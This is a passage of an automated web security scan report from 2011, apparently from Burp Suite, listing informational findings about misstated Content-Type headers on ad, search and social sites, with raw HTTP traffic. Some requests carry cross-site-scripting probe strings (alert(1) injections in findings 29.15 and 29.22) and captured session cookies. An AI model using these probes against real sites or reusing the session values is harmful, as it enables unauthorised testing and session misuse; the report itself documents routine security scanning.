http://offers.lendingtree.com/splitter/splitter.ashx
http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard
http://r.nexac.com/e/getdata.xgi
http://rad.msn.com/ADSAdClient31.dll
http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php
http://showads.pubmatic.com/AdServer/AdServerServlet
http://sociallist.org/widget.js
http://sr2.liveperson.net/hcp/html/mTag.js
http://sr2.liveperson.net/visitor/addons/deploy.asp
https://trustseal.verisign.com/getseal
http://trw.com/00_assets/02_videos/Orb_Loop.flv
http://trw.com/sites/default/themes/trw/images/footer_sep.gif
http://twitter.com/favorites/toptweets.json
http://twitter.com/oexchange.xrd
https://twitter.com/oexchange.xrd
http://urls.api.twitter.com/1/urls/count.json
https://www.astaro.com/design/en/images/icons/favicon.ico
http://www.bing.com/local/ypdefault.aspx
http://www.bing.com/search
http://www.bing.com/shopping
http://www.bing.com/shopping/pet-beds/c/5533
http://www.bing.com/shopping/photo-storage-presentation/search
http://www.bing.com/shopping/search
http://www.bing.com/shopping/televisions/c/4724
http://www.bing.com/shopping/valentines-day-gift-ideas/r/144
http://www.bing.com/shopping/womens-workout-clothing/r/146
http://www.bing.com/travel/deals/cheap-flights-to-las-vegas.do
http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643
http://www.bing.com/travel/hotels
https://www.ehow.com/forms/Support/DisplayCaptchaImage.aspx
http://www.facebook.com/extern/login_status.php
http://www.google.com/search
http://www.mensfitness.com/favicon.ico
http://www.omniture.com/listener.html
http://www.orbitz.com/App/ViewTravelWatchHome
http://www.orbitz.com/cacheable/empty.html
http://www.orbitz.com/helper/populateStateList
http://www.orbitz.com/helper/smartfill
http://www.plentyoffish.com/JpegImage.aspx
http://www.plentyoffish.com/accordian.pack.js
http://www.plentyoffish.com/member11499165.htm
http://www.plentyoffish.com/member1242943.htm
http://www.plentyoffish.com/member16373418.htm
http://www.plentyoffish.com/member19992238.htm
http://www.plentyoffish.com/member22529971.htm
http://www.plentyoffish.com/member22970699.htm
http://www.plentyoffish.com/member23010679.htm
http://www.plentyoffish.com/member23031204.htm
http://www.plentyoffish.com/member23817184.htm
http://www.plentyoffish.com/member24663198.htm
http://www.plentyoffish.com/member24778333.htm
http://www.plentyoffish.com/member25294614.htm
http://www.plentyoffish.com/member25300504.htm
http://www.plentyoffish.com/member25401489.htm
http://www.plentyoffish.com/member25429166.htm
http://www.plentyoffish.com/needs_test.aspx
http://www.plentyoffish.com/safety.aspx
http://www.plentyoffish.com/terms.aspx
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573754525&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/html.ng/channel=deals&Section=promo_activities&adsize=featuredest&dest=PROMOTIONS&area=DPT&country=US&CookieName=OSC&secure=false&v=173.193.214.243-504835424.30129806&m=0&site=orbitz&subdomain=orbitz&group=A&activity=PROMOTIONS&tile=1296573772004&dsrc=7&adType=script&pos=middle&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&height=225&rotator=true&width=519&adType=script&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296573746089&dsrc=7&
http://www.stocktrader.org.uk/remote2/ST1-1.php
http://www.techmynd.com/feed/atom/
http://www.threatexpert.com/settings.xml
http://www.w3.org/TR/html4/strict.dtd
http://www.websitetoolbox.com/cgi/stat/js.cgi

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

29.1. http://a.rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a.rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; Charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.2. https://a248.e.akamai.net/demdex.download.akamai.com/dm/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://a248.e.akamai.net
Path:	/demdex.download.akamai.com/dm/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /demdex.download.akamai.com/dm/ HTTP/1.1
Host: a248.e.akamai.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Cache-Control: max-age=3600
Date: Wed, 02 Feb 2011 16:18:19 GMT
Content-Length: 15
Connection: close

File not found.

29.3. http://a3.twimg.com/profile_images/299906134/acangiano_normal.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a3.twimg.com
Path:	/profile_images/299906134/acangiano_normal.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/299906134/acangiano_normal.gif HTTP/1.1
Host: a3.twimg.com
Proxy-Connection: keep-alive
Referer: http://twitter.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: ESycABeCUL+lsIlPy4OaTlubTeTKNzaywPEfhtMetPyPQRpHb3bRW3LH+2ms8C+k
x-amz-request-id: 9CE54A11A01F4799
Last-Modified: Mon, 06 Jul 2009 14:42:41 GMT
ETag: "a9fb21d67264111a7b650b8b939273d6"
Accept-Ranges: bytes
Content-Length: 3443
Server: AmazonS3
X-Amz-Cf-Id: 438e4665b0078668945be7a7521399429536b24a69b3667fe1ab78f1d130ac53cd38b73950b3ef69,bfc51ca4660a106f782b7751c5dfbb744ace8b8eada7d8a3f3f3f873e08755761777241b376c79b8
X-CDN: AKAM
Cache-Control: max-age=29218423
Expires: Fri, 06 Jan 2012 20:33:31 GMT
Date: Wed, 02 Feb 2011 16:19:48 GMT
Connection: close
Content-Type: image/gif
X-CDN: AKAM

.PNG
.
...IHDR...0...0......`n.... pHYs...H...H.F.k>... vpAg...0...0....W...IDATX..Yi.\.u>...^.....g..H....h.!.b....q.b.J..b..;N..M*E......T.I(..^*... ".P6........H..3....g.....{.....l...S......}..
...[SNIP]...

29.4. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Tue, 01 Feb 2011 15:29:56 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

29.5. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

29.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1377911769 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1377911769

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1377911769?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=1377911769&PG=INVSRQ&ASID=2af8a7eb720e4efda85b7da3171198fc HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:198:3:0:38655:1296683214:L|33:1391:835:95:0:38655:1296683213:L|33:1411:992:100:0:34115:1296410365:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:48:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1653

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

29.9. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:48:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1652

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

29.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/991035629 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/991035629

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/991035629?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=991035629&PG=INVSRQ&ASID=cb0b7f4255734b4ba18190811d8f4ee6 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:992:100:0:34115:1296410365:B2|33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:46:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1652

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...

29.11. https://admin.testandtarget.omniture.com/login_hal.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/login_hal.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

29.12. https://admin.testandtarget.omniture.com/scripts/jquery/jquery.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/scripts/jquery/jquery.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.13. https://admin.testandtarget.omniture.com/skins/omniture/login.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/login.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

29.14. https://admin.testandtarget.omniture.com/skins/omniture/static_header.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://admin.testandtarget.omniture.com
Path:	/skins/omniture/static_header.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

29.15. http://api.blogburst.com/EntityImageHandler.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.blogburst.com
Path:	/EntityImageHandler.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /EntityImageHandler.ashx?id=7806eb91-f4e3-4539-9c79-331ff3c4b5e1 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate, post-check=2400,pre-check=3600, max-age=3600
Content-Length: 2793
Content-Type: image/jpeg
Expires: Wed, 02 Feb 2011 16:13:48 GMT
Last-Modified: Wed, 02 Feb 2011 14:20:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-BlogBurst: CachingFileHandler
If-Modified-Since: Wed, 2 Feb 2011 14:20:48 GMT
Date: Wed, 02 Feb 2011 15:13:48 GMT

GIF89a>.>.................Q!..r..9.................d....jU.......................U............................................[....a#.....'.m=.....L..........................3.........................
...[SNIP]...

29.16. http://api.blogburst.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.blogburst.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:57:21 GMT
Content-Length: 169

Error handler problem:
Error Number: B820Gu9N7dmczIktcU9Rger
Error Path: /favicon.ico
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib

29.17. http://api.blogburst.com/v1.0/WidgetDeliveryService.ashx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.blogburst.com
Path:	/v1.0/WidgetDeliveryService.ashx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=utf-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v1.0/WidgetDeliveryService.ashx HTTP/1.1
Host: api.blogburst.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 16:18:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 106

gBlogBurstWidgetProxy.HandleResponse("100", "<!-- widget : 100 , widget not found in HTTP context --\>");

29.18. http://bannerfarm.ace.advertising.com/bannerfarm/84352/siteIDs.txt previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bannerfarm.ace.advertising.com
Path:	/bannerfarm/84352/siteIDs.txt

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /bannerfarm/84352/siteIDs.txt HTTP/1.1
Host: bannerfarm.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://bannerfarm.ace.advertising.com/bannerfarm/157921/10.4.10.CSG_TPN_LVS_20100824_01_geo_300x250.swf?clickTag=http://r1-ads.ace.advertising.com/click/site=0000747145/mnum=0000961923/cstr=11479363=_4d48254a,7376408871,747145^961923^1183^0,1_/xsxdata=$xsxdata/bnum=11479363&siteValue=0000747145&city=Dallas
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; GUID=MTI5NjQwODEwMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=HVCSNJpwHg02FN5BdbdRTewUwX0kH8Y4FN5BYTeRTeQ3gZ0kHQTnGN5BF2pRTeAohX0kHYZ4FN5BKGeRTewohX0kHca4FN5BiGeRTeQshX0kwOIAM/oBqJ7YBwAoGG5r1NQcKa4dGKmAI9YBxO53DkL3Fh3gPTw6TVEnsuWB/0mxpda7GIaWGbUrMaw41ZAVkqlB6bjxTr6bCwWZGG/r4fQsMasbwa3BW8oxu1I9HsfzFB3sNeQQoa0ks2zB1xmBmD; F1=BoUJI1EBAAAABAAAAIAAgEA; BASE=YnQI/8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAetICCpOvL!; ROLL=v5Q2W0MtUuzqOtGriBc3MVD!
If-None-Match: "b333e-495c-49ad627f6b0c0"
If-Modified-Since: Thu, 27 Jan 2011 16:08:11 GMT

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 27 Jan 2011 16:08:11 GMT
ETag: "b333e-495c-49ad627f6b0c0"
Accept-Ranges: bytes
Content-Length: 18780
Content-Type: text/plain; charset=UTF-8
Date: Tue, 01 Feb 2011 15:30:27 GMT
Connection: close

...&siteVals=
85
9009
29700
30838
30848
84288
107683
38302
290981
290982
681098
681099
681100
683996
689259
689454
690334
690966
691074
691075
691171
691233
692681
692861
6935
...[SNIP]...

29.19. http://blekko.com/autocomplete previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blekko.com
Path:	/autocomplete

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /autocomplete?query=x HTTP/1.1
Host: blekko.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/
X-Requested-With: XMLHttpRequest
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fbl=2; v=1; sessionid=352926924

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:21:50 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=15
Vary: Accept-Encoding
Cache-Control: max-age=43200
Expires: Thu, 03 Feb 2011 07:21:50 GMT
Vary: Accept-Encoding
X-Blekko-PT: c220c0af230f838a718de1c77b82d803
Content-Length: 203

{"suggestions":["xbox 360","xbox 360 /reviews","xbox 360 /videogames","xbox 360 /techblogs","xbox live","xbox live /videogames","xbox live /techblogs","xbox live /gadgets","xml","xml /java"],"query":"
...[SNIP]...

29.20. http://blekko.com/tag/pref previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://blekko.com
Path:	/tag/pref

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tag/pref?val=1&blockuser= HTTP/1.1
Host: blekko.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: v=3; t=1296674604621; suggestedSlashtagsList=1; sessionid=352926924; fbl=2;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Feb 2011 19:41:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Cache-Control: no-cache, max-age=0
Expires: -1
Pragma: no-cache
Content-Length: 26
X-Blekko-PT: 1508884001e2f9df27770e3471a83b4c

ERROR: must be a logged in

29.21. http://boardreader.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://boardreader.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: boardreader.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: human_user=true; __utmb=69622787; __utmc=69622787; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 13 Apr 2009 05:51:55 GMT
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Date: Wed, 02 Feb 2011 17:42:53 GMT
Server: Apache
Age: 24376
Connection: keep-alive

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

29.22. http://boardreader.com/linksGraphXML.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://boardreader.com
Path:	/linksGraphXML.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /linksGraphXML.php?a=domain&q=2mdn.net&ebef7%22%3E%3Cscript%3Ealert(1)%3C/script%3E6f696982a6d=1&p=30&x=1 HTTP/1.1
Host: boardreader.com
Proxy-Connection: keep-alive
Referer: http://boardreader.com/Charts/MSCombiDY2D.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
